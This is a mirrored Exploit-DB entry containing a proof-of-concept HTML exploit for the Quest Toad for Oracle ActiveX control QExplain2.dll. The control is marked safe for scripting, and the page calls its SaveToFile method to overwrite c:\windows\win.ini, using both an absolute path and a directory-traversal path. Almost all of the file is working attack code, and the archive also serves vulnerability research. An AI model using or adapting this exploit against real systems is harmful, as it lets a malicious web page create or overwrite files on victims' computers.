exploit-db-mirror/exploits/windows/remote/18703.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

31 lines
No EOL
808 B
Text

<!--
Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115)
Remote File Creation / Overwrite
vendor site: http://www.quest.com/
file tested: Quest_Toad-Development-Suite-for-Oracle_110R2.exe
CLSID: {F7014877-6F5A-4019-A3B2-74077F2AE126}
Progid: QExplain2.ExplainPlanDisplayX
Binary Path: C:\PROGRA~1\COMMON~1\QUESTS~1\QEXPLA~1.DLL
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:F7014877-6F5A-4019-A3B2-74077F2AE126' id='obj' width=640 height=480 />
</object>
<script>
try{
obj.SaveToFile("c:\\windows\\win.ini");
}catch(e){
}
try{
obj.SaveToFile("../../../../../../../../../../windows/win.ini");
}catch(e){
}
</script>